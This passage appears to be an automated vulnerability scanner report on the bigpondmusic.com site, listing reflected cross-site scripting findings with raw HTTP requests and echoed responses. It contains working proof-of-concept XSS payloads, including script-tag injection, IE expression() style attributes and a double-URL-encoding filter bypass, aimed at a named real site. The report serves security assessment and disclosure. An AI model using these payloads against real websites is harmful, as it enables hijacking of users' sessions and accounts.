Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:30:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87881


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/100/808469a"><script>alert(1)</script>c4c8c7be166" />
...[SNIP]...

2.15. http://bigpondmusic.com/100/80 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /100/80

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b562'%3bc2936948212 was submitted in the REST URL parameter 2. This input was echoed as 5b562';c2936948212 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /100/805b562'%3bc2936948212 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:30:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87691


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
calhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = '100';
   s.prop4 = '805b562';c2936948212';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.prop11 = 'Non-Registered-Musi
...[SNIP]...

2.16. http://bigpondmusic.com/100/80 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /100/80

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95fa6"style%3d"x%3aexpression(alert(1))"a3ab55095f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 95fa6"style="x:expression(alert(1))"a3ab55095f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /100/80?95fa6"style%3d"x%3aexpression(alert(1))"a3ab55095f4=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:29:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 164679


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Get the best 100 albums from
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/100/80?95fa6"style="x:expression(alert(1))"a3ab55095f4=1" />
...[SNIP]...

2.17. http://bigpondmusic.com/CombineScriptHandler.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /CombineScriptHandler.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6e1c8'%3b5e1da53fc24 was submitted in the REST URL parameter 1. This input was echoed as 6e1c8';5e1da53fc24 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CombineScriptHandler.aspx6e1c8'%3b5e1da53fc24 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:25:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87688


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
ost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'combinescripthandler.aspx6e1c8';5e1da53fc24';
   
   
       s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel;
   s.prop11 = 'Non-Registered-Music';
   s.prop12 = 'Non-Registe
...[SNIP]...

2.18. http://bigpondmusic.com/CombineScriptHandler.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /CombineScriptHandler.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 665d1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed41d805a51f was submitted in the REST URL parameter 1. This input was echoed as 665d1"><script>alert(1)</script>d41d805a51f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /CombineScriptHandler.aspx665d1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed41d805a51f HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:25:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87947


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/CombineScriptHandler.aspx665d1"><script>alert(1)</script>d41d805a51f" />
...[SNIP]...

2.19. http://bigpondmusic.com/Vouchers/GiftBoxSelector [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /Vouchers/GiftBoxSelector

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ca3d'%3b95eca681716 was submitted in the REST URL parameter 1. This input was echoed as 4ca3d';95eca681716 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Vouchers4ca3d'%3b95eca681716/GiftBoxSelector HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 02:48:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87745


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
bpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'vouchers4ca3d';95eca681716';
   s.prop4 = 'giftboxselector';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   
...[SNIP]...

2.20. http://bigpondmusic.com/Vouchers/GiftBoxSelector [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /Vouchers/GiftBoxSelector

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47902%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e067d355d8b4 was submitted in the REST URL parameter 1. This input was echoed as 47902"><script>alert(1)</script>067d355d8b4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Vouchers47902%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e067d355d8b4/GiftBoxSelector HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 02:48:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87945


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/Vouchers47902"><script>alert(1)</script>067d355d8b4/GiftBoxSelector" />
...[SNIP]...

2.21. http://bigpondmusic.com/Vouchers/GiftBoxSelector [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /Vouchers/GiftBoxSelector

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bd4a2'%3b26b7643601d was submitted in the REST URL parameter 2. This input was echoed as bd4a2';26b7643601d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Vouchers/GiftBoxSelectorbd4a2'%3b26b7643601d HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 02:48:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87855


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
taging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'vouchers';
   s.prop4 = 'giftboxselectorbd4a2';26b7643601d';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.prop11 = 'Non-Registered-Musi
...[SNIP]...

2.22. http://bigpondmusic.com/Vouchers/GiftBoxSelector [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /Vouchers/GiftBoxSelector

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6c7e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1cc45bc0d49 was submitted in the REST URL parameter 2. This input was echoed as e6c7e"><script>alert(1)</script>1cc45bc0d49 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Vouchers/GiftBoxSelectore6c7e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1cc45bc0d49 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 02:48:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87909


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/Vouchers/GiftBoxSelectore6c7e"><script>alert(1)</script>1cc45bc0d49" />
...[SNIP]...

2.23. http://bigpondmusic.com/album/angus-julia-stone/down-the-way [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/angus-julia-stone/down-the-way

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b383'%3b9a24d6a46d7 was submitted in the REST URL parameter 1. This input was echoed as 5b383';9a24d6a46d7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /album5b383'%3b9a24d6a46d7/angus-julia-stone/down-the-way HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:19:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87992


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'album5b383';9a24d6a46d7';
   s.prop4 = 'angus-julia-stone';
   s.prop5 = 'down-the-way';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.
...[SNIP]...

2.24. http://bigpondmusic.com/album/angus-julia-stone/down-the-way [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/angus-julia-stone/down-the-way

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ec0c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea2da5f79c49 was submitted in the REST URL parameter 1. This input was echoed as 9ec0c"><script>alert(1)</script>a2da5f79c49 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album9ec0c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea2da5f79c49/angus-julia-stone/down-the-way HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:19:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87987


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album9ec0c"><script>alert(1)</script>a2da5f79c49/angus-julia-stone/down-the-way" />
...[SNIP]...

2.25. http://bigpondmusic.com/album/angus-julia-stone/down-the-way [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/angus-julia-stone/down-the-way

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b13a6"style%3d"x%3aexpression(alert(1))"ea60f3dc6d6 was submitted in the h parameter. This input was echoed as b13a6"style="x:expression(alert(1))"ea60f3dc6d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/angus-julia-stone/down-the-way?h=598216448b13a6"style%3d"x%3aexpression(alert(1))"ea60f3dc6d6 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:19:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 123630


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Angus &amp; Julia Stone - Do
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/angus-julia-stone/down-the-way?h=598216448b13a6"style="x:expression(alert(1))"ea60f3dc6d6" />
...[SNIP]...

2.26. http://bigpondmusic.com/album/angus-julia-stone/down-the-way [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/angus-julia-stone/down-the-way

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94180"style%3d"x%3aexpression(alert(1))"cea24253dac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 94180"style="x:expression(alert(1))"cea24253dac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/angus-julia-stone/down-the-way?94180"style%3d"x%3aexpression(alert(1))"cea24253dac=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

